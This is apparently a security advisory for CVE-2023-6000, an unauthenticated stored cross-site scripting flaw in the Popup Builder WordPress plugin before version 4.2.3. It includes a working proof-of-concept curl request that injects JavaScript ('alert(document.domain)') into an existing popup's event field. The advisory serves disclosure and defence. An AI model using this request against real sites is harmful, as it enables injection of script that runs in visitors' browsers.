Popup Builder < 4.2.3 – Unauthenticated Stored XSS | CVE 2023-6000

Description

The plugin does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.

Proof of Concept

1) Create a popup using the plugin
2) Run the following curl command, switching `$POPUPID` with that popup's ID:

```
curl --url 'http://vulnerable-site.tld/' --data 'sgpb-is-preview=1&blah[name]=sgpb-is-preview&blah[value]=0&post_ID=$POPUPID&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=everywhere&sgpb-type=html&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=contact-form-7&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Boperator%5D=redirect-url&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bvalue%5D=https%3A%2F%2Fexample.com&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120px&sgpb-min-height=&sgpb-copy-to-clipboard-message=Copied+to+Clipboard%21&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&sgpb-ShouldOpen=alert%28document.domain%29%3B&sgpb-WillOpen=&sgpb-DidOpen=&sgpb-ShouldClose=&sgpb-WillClose=&sgpb-DidClose=&sgpb-css-editor='
```

3) Visit the site